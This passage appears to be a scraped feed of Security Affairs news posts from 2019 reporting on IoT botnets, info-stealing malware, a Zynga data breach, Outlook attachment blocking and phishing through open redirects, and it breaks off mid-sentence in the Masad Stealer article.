First spotted in the internet on August 3rd, 2019, a new Linux/AirDropBot has been reported, is a malware that has been built to aim many embedded Linux OS platform, it is meant to propagate its botnet into several originally coded and built for aiming the IoT used platforms. It’s still not in the final stage of development judging from some uncoded functions,  but the adversary mission is clear, to get as much Linux IoT infected as possible and get rid of his competitors. It was first detected as Mirai or Gafgyt like during the detection spotted in the first series of samples, and this may make researchers in Linux malware ignored its first existence.

So many processors are aimed by the malware, but if CPU like ARC Cores, Renesas SH, Motorola m68000, Altera Nios II, Tensilica Xtensa and Xilinx MicroBlaze CPU is aimed along with other generic cross-compiled CPU (MIPS/ARM/PPC/SPARC/Intel), the herder meant serious business to “pwn” the reachable IoTs. The binary is having two categories, the one that acts as bots and meant to infect the small devices and for bigger systems it has the worm-like vulnerability scanner aims CGI page on routers (in this version is aiming HTTP port 8080 on specific product CGI file) that can infect itself in a worm-like style along with the telnet scanning basis (attacking TCP port 23 or 2323).

The analysis made in MalwareMustDie blog’s recent post “MMD-0064-2019 – Linux/AirDropBot” is showing the latest binary sets, used by the adversaries behind this botnet. Scanner function for exploiting a certain router’s vulnerability is hardcoded and this threat is also aiming at other exploit too on older samples delivery. The overall idea is a known ones but the code is newly made.

Final considerations on the behavior to take in order to face this threat.

Internet of things are on improvement for its security quality, and governments all over the globe are seriously handling this, for example in the US the “Security Feature Recommendations for IoT Devices” by NIST is a good recommended plan, in the UK a voluntary code of practice (CoP) to help manufacturers boost the security of internet-connected devices that make up the internet of things (IoT) has been published, or in Japan the Project to Survey IoT Devices and to Alert Users has been started. Yet, there are a lot of products to handle and vulnerabilities for these products which are also researched at the same time by adversaries.
This makes IoT threat is still making a lot of issues since day-by-day new exploit issue actually comes up, old issues are re-used, unpatched segments are revealed and aimed.

Are we the wrong track then? I don’t think so. Yes, the process takes time and what we can do is keep on improving the detection on a new threat, containment, and response as prevention to strengthen the defense scheme for the platform, along with the parallel legal works on stopping adversaries. If we are committing to keep on doing these steps the adversaries will find more demerits than merits to keep on hammering is with their botnets.

About the Author: 

Odisseus – Independent Security Researcher involved in Italy and worldwide in topics related to hacking, penetration testing and development.

Pierluigi Paganini

(SecurityAffairs – AirDropBot, malware)

The post Exclusive: MalwareMustDie analyzes a new IoT malware dubbed Linux/ AirDropBot appeared first on Security Affairs.

Iran’s oil minister orders ‘Full Alert’ for oil sector on against attacks

Iran ‘s oil minister on Sunday ordered representatives of the energy sector to be on ‘full alert’ to the threat of “physical and cyber” attacks.

Iran’s oil minister, Bijan Namdar Zanganeh, ordered companies operating in the energy sector to be on ‘full alert’ to the threat of “physical and cyber” attacks.

it is necessary for all companies and installations the oil industry to be on full alert against physical and cyber threats,” reads a statement published on the oil ministry’s Shana website.

Iran fears a retaliation of Western countries that are accusing it to carry out physical and cyber attacks against their infrastructure and countries in the Middle East.

Iran’s oil ministry said that the Government of Washington has launched a full-scale economic war” against the Islamic republic.

In the middle-September, drone attacks hit two major oil facilities run by the state-owned company Aramco in Saudi Arabia, one of them is the Abqaiq site.

Iran-backed Houthi rebels in Yemen claimed responsibility for the attacks on the Abqaiq plant, according to a spokesman for the group in Yemen, it had deployed 10 drones in the attacks.

The group is threatening Saudi Arabia of further attacks. The Iran-aligned Houthi rebel movement fights the Yemeni government and a coalition of regional countries led by Saudi Arabia that fights the rebels since 2015, when President Abdrabbuh Mansour Hadi was was kicked out of Sanaa by the Houthis.

Secretary of State Mike Pompeo blamed Iran for coordinated the attacks, it added that we are facing an unprecedented attack on the world’s energy supply.

Riyadh, Berlin, London, and Paris also blame Teheran for attacks that caused severe damages to the Saudi oil sector on September 14.

Iran denied any involvement in the attacks. Immediately after the attacks, US President Donald Trump announced that his country was preparing a response. President Trump opted out for an intensification of economic sanctions against Teheran.

Military and intelligence experts believe that western coalition, driven by the US could carry out a series of cyber attacks against Iranian critical infrastructure. A few days after the drone attacks, some western media reported destructive cyber attacks against infrastructures in the Iranian oil sector, but Iran denied it.

“Contrary to Western media claims, investigations done today show no successful cyber attack was made on the country’s oil installations and other crucial infrastructure,” reads a statement published by the government’s cyber security office.

Despite the statement, security experts believe that a cyber offensive against Iranian infrastructure is onoing.

Pierluigi Paganini

(SecurityAffairs – Iran, oil sector)

The post Iran’s oil minister orders ‘Full Alert’ for oil sector on against attacks appeared first on Security Affairs.

Arcane Stealer V, a threat for lower-skilled adversaries that scares experts

Experts recently analyzed an information-stealing malware tracked as Arcane Stealer V that is very cheap and easy to buy in the Dark Web.

In July 2019, researchers at Fidelis Threat Research Team (TRT) analyzed a sample of Arcane Stealer V, a .net information-stealing malware that is easy to acquire in the dark web. The author of the malware is selling it on his own website and on the Lolzteam site on the Dark Web, the researchers also found cracked versions on multiple community discussion and file-sharing platforms.

The malware is quite cheap, it goes for just $9 on the Dark Web, and could be also used by lower-skilled adversaries. Due to the low-cost of the malware, experts believe that its popularity could rapidly increase.

“The Arcane Stealer is a .net information stealer. The malware is available as a graphical user interface (GUI) or users can purchase the code, making it easier for actors with novice skills to employ. It sells for 699 Rubles or approximately 9 US dollars.” reads the post published by the researchers. “There is also support available on Telegram along with other “helpful” bots.”

In early August, the researchers were able to track multiple instant messenger and social media accounts associated with a Russian-language actor that might be the author of the malware.

The malware is able to collect various data from victims, including operating system, browser information, cryptocurrency wallets and instant-messaging sessions from Telegram, Discord, and Pidgin, data (i.e. passwords, cookies and forms) from a several of browsers, including Chrome, Opera, Kometa, Orbitum, Comodo, Amigo, Torch and Yandex.

Arcane Stealer V could be used to steal documents, collect Steam gaming community data, logs detected virtual machine IPs, and data from FileZilla servers.

The threat actor behind the Arcane Stealer V also provides dashboards and statistics to show crooks that buy the malware the potential earnings.

Arcane Stealer V

When the malware runs, it takes a screenshot and then it creates a text log file of what was collected.

“When ran, the file collects data, takes a screenshot and then it creates a text log file of what was collected. It stores all of the information in a folder in %appdata%/local/{hwid}/.” continues the post. ” It uses the assigned hardware ID that the malware generates as the folder name and zip folder name.”

Then the malware sends the zipped file to the C2 server.

The researchers identified multiple Telegram and Twitter accounts with the handles “@arcanee_bot,” “@es3n1n” and “@SakariHack,” that were used to discuss how to build and distribute the malware. These accounts were all associated with the same Russian-language actor, a 21-year-old man that says to suffer a form of epilepsy.

“The actor associated with the malware appears to be a native Russian speaker, however it is unclear if the actor is currently located in Russia,” continues the analysis. “The actor’s information-stealer does not appear to limit potential targets. Analysts have observed the capability of Russian sites to be targeted in the malware.”

Experts pointed out that the malware unlike other threats doesn’t discriminate geo-location of the victims and could be used against any target.

“Based off current observation and analysis, Arcane Stealer and its developer(s) appear to be low-level threats.” conclude the experts.

“Due to the lack of traversal, propagation, or destructive capabilities at the time of analysis, it is assessed with moderate confidence that this malware may not become popular with high-value and highly capable actors. However, because users can buy the source code, it is possible that we may see other threat actors reusing the malware and creating their own variant of Arcane V, as has been done with other popular malware families, like njRAT.”

Pierluigi Paganini

(SecurityAffairs – Arcane Stealer V, malware)

The post Arcane Stealer V, a threat for lower-skilled adversaries that scares experts appeared first on Security Affairs.

Microsoft will add new file types to the list of blocked ones in Outlook on the Web

Microsoft announced last week it is going to expand the list of file extensions that are blocked in Outlook on the web.

Microsoft announced that it will immediately block other file extensions for its Outlook web users, it will impossible for them to download this type of attachments.

Microsoft pointed out that the newly blocked file types are rarely used, this means that most organizations will face no problems with the change.

The list of file types that will be blocked by Microsoft include ones used by popular programing languages such as “.py“, “.pyc“, “.pyo“, “.pyw“, “.pyz“, “.pyzw” (used by Python); “.ps1″, “.ps1xml”, “.ps2″, “.ps2xml”, “.psc1″, “.psc2″, “.psd1″, “.psdm1″, “.psd1″, “.psdm1″, “.cdxml” and “.pssc” (used by PowerShell); and “.jar” and “.jnlp” (used by Java).

Microsoft announced it will block also “.appcontent-ms“, “.settingcontent-ms“, “.cnt“, “.hpj“, “.website”, “.webpnp“, “.mcf“, “.printerexport“, “.pl“, “.theme”, “.vbp“, “.xbap“, “.xll“, “.xnk“, “.msu“, “.diagcab” and “.grp“.

Other file types that will be blocked by the tech giant are the ones having the “.appref-ms” extension used by Windows ClickOnce, the “.udl” extension used by Microsoft Data Access Components (MDAC), the “.wsb” extension used by Windows sandbox, and the “.cer“, “.crt” and “.der” extensions associated with digital certificates.

“The following extensions are used by various applications.” reads the post published by Microsoft.”While the associated vulnerabilities have been patched (for years, in most cases), they are being blocked for the benefit of organizations that might still have older versions of the application software in use:

“.appcontent-ms”, “.settingcontent-ms”, “.cnt”, “.hpj”, “.website”, “.webpnp”, “.mcf”, “.printerexport”, “.pl”, “.theme”, “.vbp”, “.xbap”, “.xll”, “.xnk”, “.msu”, “.diagcab”, “.grp”

In case organizations have to allow for the use of a particular file type, admins could add specific extensions to the AllowedFileTypes property of users’ OwaMailboxPolicy objects.

“If you want a particular file type to be allowed, you can add that file type to the AllowedFileTypes property of your users’ OwaMailboxPolicy objects.” continues the post. “To add a file extension to the AllowedFileTypes list:

$policy = Get-OwaMailboxPolicy [policy name]
$allowedFileTypes = $policy.AllowedFileTypes
$allowedFileTypes.Add(".foo")
Set-OwaMailboxPolicy $policy -AllowedFileTypes $allowedFileTypes

“Security of our customer’s data is our utmost priority, and we hope our customers will understand and appreciate this change. Change can be disruptive, so we hope the information here explains what we’re doing and why,” Microsoft concludes.

Pierluigi Paganini

(SecurityAffairs – Outlook, hacking)

The post Microsoft will add new file types to the list of blocked ones in Outlook on the Web appeared first on Security Affairs.

Phishers continue to abuse Adobe and Google Open Redirects

Adobe and Google Open Redirects Abused by Phishing Campaigns

Experts reported that phishing campaigns are leveraging Google and Adobe open redirects to bypass spam filters and redirect users to malicious sites.

Phishers are abusing Google and Adobe open redirects to bypass spam filters and redirect users to malicious sites.

Crooks abuse Google and Adobe services to create URLs that point to malicious websites that anyway are able to bypass security filters because they appear as legitimate URLs from trusted IT giants.

“Open redirectors take you from a Google URL to another website chosen by whoever constructed the link. Some members of the security community argue that the redirectors aid phishing, because users may be inclined to trust the mouse hover tooltip on a link and then fail to examine the address bar once the navigation takes place. reads the post published by Google.

“Our take on this is that tooltips are not a reliable security indicator, and can be tampered with in many ways; so, we invest in technologies to detect and alert users about phishing and abuse, but we generally hold that a small number of properly monitored offers fairly clear benefits and poses very little practical risk.”

An example of Google open redirect is https://www.google.com/url?q=[url] that could be abused by attackers.

“Phishing campaigns commonly utilize open redirects from well known companies as they feel users will be more likely to click on a link if it belongs to Google or Adobe.” reported BleepingComputer.

Below an example of a phishing message that uses Google open redirect that points to a fake login page.

In a similar way, attackers could abuse the Adobe redirect service in phishing campaigns.

Experts suggest administrators and users remain vigilant on open redirects.

Pierluigi Paganini

(SecurityAffairs – google open redirects, phishing)


The post Phishers continue to abuse Adobe and Google Open Redirects appeared first on Security Affairs.

Security Affairs newsletter Round 233

A new round of the weekly newsletter arrived! The best news of the week with Security Affairs



Hi folk, let me inform you that I suspended the newsletter service, anyway I’ll continue to provide you a list of published posts every week through the blog.

Once again thank you!

0patch will provide micropatches for Windows 7 and Server 2008 after EoS
Critical flaws affect Jira Service Desk and Jira Service Desk Data Center
Facebook suspends tens of thousands of apps from hundreds of developers
Campbell County Memorial Hospital in Wyoming hit by ransomware attack
Portugues hacker faces hundreds of Charges in Football Leaks case
Portuguese hacker faces hundreds of Charges in Football Leaks case
Privilege Escalation flaw found in Forcepoint VPN Client for Windows
Thinkful forces a password reset for all users after a data breach
TortoiseShell Group targets IT Providers in supply chain attacks
A new Fancy Bear backdoor used to target political targets
APT or not APT? Whats Behind the Aggah Campaign
Hacker discloses details and PoC exploit code for unpatched 0Day in vBulletin
Microsoft released an out-of-band patch to fix Zero-day flaw exploited in the wild
North Korea-linked malware ATMDtrack infected ATMs in India
Adobe Patches two critical vulnerabilities in ColdFusion
Czech Intelligence ‘s report attributes major cyber attack to China
Heyyo dating app left its users data exposed online
US Utilities Targeted with LookBack RAT in a new phishing campaign
Airbus suppliers were hit by four major attack in the last 12 months
Botnet exploits recent vBulletin flaw to protect its bots
Emsisoft releases a free decryptor for the WannaCryFake ransomware
Study shows connections between 2000 malware samples used by Russian APT groups
USBsamurai for Dummies: How To Make a Malicious USB Implant & Bypass Air-Gapped Environments for 10$. The Dumb-Proof Guide.
Checkm8: unpatchable iOS exploit could lead to permanent jailbreak for iOS devices running A5 to A11 chips
DoorDash Data Breach exposes data of approximately 5 million users
Emsisoft released a new free decryption tool for the Avest ransomware
Magecart 5 hacker group targets L7 Routers
After SIMJacker, WIBattack hacking technique disclosed. Billions of users at risk
German police arrest suspects in raid network hosting Darknet marketplaces
Malware-based attacks disrupted operations of Rheinmetall AG and Defence Construction Canada
Nodersok malware delivery campaign relies on advanced techniques

Pierluigi Paganini

(SecurityAffairs – newsletter)

The post Security Affairs newsletter Round 233 appeared first on Security Affairs.

Security Affairs 2019-09-29 06:48:05

Hackers have stolen more than 218 million records from the popular ‘Words With Friends’ developed by the mobile social game company Zynga Inc.

Do you remember Gnosticplayers? The popular hacker Gnosticplayers that between February and April disclosed the existence of some massive unreported data breaches in five rounds.  He offered for sale almost a billion user records stolen from nearly 45 popular online services.

Now the Pakistani hacker claims to have stolen more than 218 million records from the popular mobile social game company Zynga Inc.

Zynga Inc is an American social game developer running social video game services founded in April 2007, it primarily focuses on mobile and social networking platforms.

Among the online games developed by the company, there are FarmVille, Words With Friends, Zynga Poker, Mafia Wars, and Café World that have over a billion players worldwide.

“Going by the online alias Gnosticplayers, the serial hacker told The Hacker News that this time, he managed to breach “Words With Friends,” a popular Zynga-developed word puzzle game, and unauthorisedly access a massive database of more than 218 million users.” reported The Hacker News.

Gnosticplayers shared a sample of stoled data with The Hacker News, exposed records includes:

  • Names
  • Email addresses
  • Login IDs
  • Hashed passwords, SHA1 with salt
  • Password reset token (if ever requested)
  • Phone numbers (if provided)
  • Facebook ID (if connected)
  • Zynga account ID
Zynga words-with-friends

Gnosticplayers revealed that he had access to data belonging to all Android and iOS game players who installed and signed up for the ‘Words With Friends’ game before 2nd September 2019.

Zynga confirmed that the account login information for certain players of Draw Something and Words With Friends that may have been exposed in the data breach. The company pointed out that hackers did not access financial information.

“We recently discovered that certain player account information may have been illegally accessed by outside hackers.  An investigation was immediately commenced, leading third-party forensics firms were retained to assist, and we have contacted law enforcement.” reads the data breach notification published by the company.

“While the investigation is ongoing, we do not believe any financial information was accessed.  However, we have identified account login information for certain players of Draw Something and Words With Friends that may have been accessed.  As a precaution, we have taken steps to protect these users’ accounts from invalid logins.  We plan to further notify players as the investigation proceeds.”

The hacker also claims to have accessed data of other Zynga gamers, including Draw Something and the discontinued OMGPOP game.

The company launched an investigation and hired third-party forensics firms to help it, of course, it also reported the incident to the law enforcement. As a precaution, the gaming firm has taken steps to protect these users’ accounts from invalid logins.

Users of the Words With Friends game, and let me suggest players of Zynga games, should immediately change the password for their account and also on any other services that share the same credentials.

Pierluigi Paganini

(SecurityAffairs – gaming, hacking)

The post appeared first on Security Affairs.

WhiteShadow downloader leverages Microsoft SQL to retrieve multiple malware

Researchers at Proofpoint have spotted a piece of downloader, dubbed WhiteShadow, that leverages Microsoft SQL queries to pull and deliver malicious payloads. 

In August, malware researchers at Proofpoint spotted a new downloader which is being used to deliver a variety of malware via Microsoft SQL queries. The experts detected new Microsoft Office macros, which collectively act as a staged downloader, and tracked it as WhiteShadow.

Initially the downloader was involved in a small campaign aimed at distributing the Crimson RAT, over the time researchers observed the implementation of detection evasion techniques.

“In August 2019, the macros that make up WhiteShadow appeared in English-language cleartext. The only observed obfuscation technique was in the simple case altering of strings such as “Full_fILE” or “rUN_pATH.” In early September, we observed slight misspellings of certain variables such as “ShellAppzz.Namespace(Unzz).” Mid-September brought another change in macro code using reversed strings such as “StrReverse(“piz.Updates\stnemucoD\”)”.” reads the analysis published by Proofpoint.

“The most recently observed versions of the WhiteShadow macros contain long randomized text strings such as “skjfhskfhksfhksfhksjfh1223sfsdf.eDrAerTerAererer”.”

Experts believe that WhiteShadow is one component of a malware delivery service that includes a rented instance of Microsoft SQL Server to host various payloads retrieved by the downloader. Experts observed the downloader in campaigns spreading Crimson RAT, Agent Tesla, AZORult, and multiple keyloggers.

The macros observed in the campaigns, once enables, execute SQL queries to retrieve the malicious code, stored as ASCII-encoded strings, from Microsoft SQL Server databases controlled by threat actors. 

The result of the query is written to disk as a PKZip archive of a Windows executable. 

WhiteShadow uses a SQLOLEDB connector to connect to a remote Microsoft SQL Server instance, execute a query, and save the results to a file in the form of a zipped executable. The SQLOLEDB connector is an installable database connector from Microsoft but is included by default in many (if not all) installations of Microsoft Office.” continues the report.

“Once extracted by the macro, the executable is run on the system to start installing malware, which is determined by the actor based on the script configuration stored in the malicious Microsoft Office attachments.”

whiteshadow

Proofpoint warns that the Microsoft SQL technique is still a rarity in the threat landscape, but threat actors could increasingly adopt it in future campaigns. 

Pierluigi Paganini

(SecurityAffairs – WhiteShadow, malware)

The post WhiteShadow downloader leverages Microsoft SQL to retrieve multiple malware appeared first on Security Affairs.

Masad Stealer Malware exfiltrates data via Telegram

Experts at Juniper Threat Labs have discovered a new piece of malware dubbed Masad Stealer that exfiltrates cryptocurrency wallet files via Telegram.

Security researchers at the Juniper Threat Labs discovered a strain of malware dubbed Masad Stealer that is actively distributed. The malware could steals files, browser information, and cryptocurrency wallet data and send them to the botmasters using a Telegram.

“The malware is being advertised on black market forums as “Masad Clipper and Stealer”. It steals browser data, which might contain usernames, passwords and credit card information. Masad Stealer also automatically replaces cryptocurrency wallets from the clipboard with its own.” reads the analysis published by the experts.

Masad Stealer sends all of the information it collects – and receive commands from – a Telegram bot controlled by the threat actor deploying that instance of Masad. Because Masad is being sold as off-the-shelf malware, it will be deployed by multiple threat actors who may or may not be the original malware writers.”

The Masad Stealer is written in Autoit scripts and is compiled into a Windows executable. The size of most of the samples analyzed by the experts was about 1.5 MiB, but experts revealed that it is possible to find larger executables bundled into other applications. 

The malware appears to be linked to another threat dubbed “Qulab Stealer”. 

Crooks are advertising the malware on hacking forums as a stealer and clipper, the ‘fully-featured’ variant is offered for sale at $85.

Masad Stealer is distributed masquerading it as a legitimate tool or bundling it into third party tools, such as CCleaner and ProxySwitcher.

Attackers attempt to trick users into downloading the malware by advertising it in forums, on third party download sites or on file sharing sites.

Victims can also get infected installing tainted versions of popular software and game cracks, and cheats.

Once infected a machine, Masad Stealer will collect a wide range of data, including system info, screenshots, desktop text files, Steam Desktop Authenticator sessions, Cryptocurrency Wallets, browser cookies, usernames, passwords, and Credit Card Browser Data.

Masad Stealer is also able to automatically replaces MoneroBitcoin Cash, Litecoin, Neo, and Web Money cryptocurrency wallets from the clipboard with its own.

The malware achieves persistence by creating a scheduled task on all Windows devices it manages. 

Once the malware has collected the information from the victims’ computers will zip them using a 7zip executable bundled within its binary, then it will exfiltrat the data to the command and control (C2) server using unique Telegram bot IDs.

The analysis of unique Telegram bot IDs and usernames associated to the malware allowed the experts to determine that there are at least 18 threat actors or campaigns actively targeting potential victims with the Masad Stealer.

“Of the more than 1,000 samples we identified to be variants of this malware, there where 338 unique Telegram Command and Control bot IDs. From this data, we can estimate the number of threat actors –